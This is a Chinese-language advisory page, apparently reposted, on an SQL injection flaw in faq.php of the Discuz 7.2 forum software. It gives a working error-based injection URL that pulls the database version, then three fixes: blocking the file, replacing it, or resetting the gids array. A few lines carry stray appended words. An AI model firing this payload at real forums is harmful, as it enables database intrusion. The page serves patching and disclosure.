Discuz 7.2 /faq.php SQL注入漏洞
測試方法:
提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
Discuz 7.2 /faq.php SQL注入漏洞
http://www.xxx.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23
修復方法:
修復文件: faq.phpphp
修復方法(一)
此文件爲顯示論壇幫助用的,功能相對獨立,您能夠在服務器禁止該文件的訪問,或者直接刪除他。對論壇常規功能沒有任何影響。安全
修復方法(二)
可使用本貼中的附件覆蓋您的舊文件服務器
修復方法(三)
手工修復faq.php
用編輯器打開該文件編輯器
查找代碼:測試
} elseif($action == 'grouppermission') {
在下面添加:
$gids = array();
相關文章
- 1. Discuz 7.2 faq.php漏洞分析
- 2. discuz 7.2 SQL 注入漏洞分析
- 3. Discuz <= 7.2 SQL注入漏洞詳情
- 4. discuz7.2 faq.php 注入漏洞分析
- 5. discuz /faq.php SQL Injection Vul
- 6. sql注入漏洞
- 7. web漏洞之SQL注入
- 8. 【漏洞分析】Discuz! X系列全版本後臺SQL注入漏洞
- 9. 查明sql注入漏洞
- 10. JDBC的SQL注入漏洞
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • YAML 入門教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
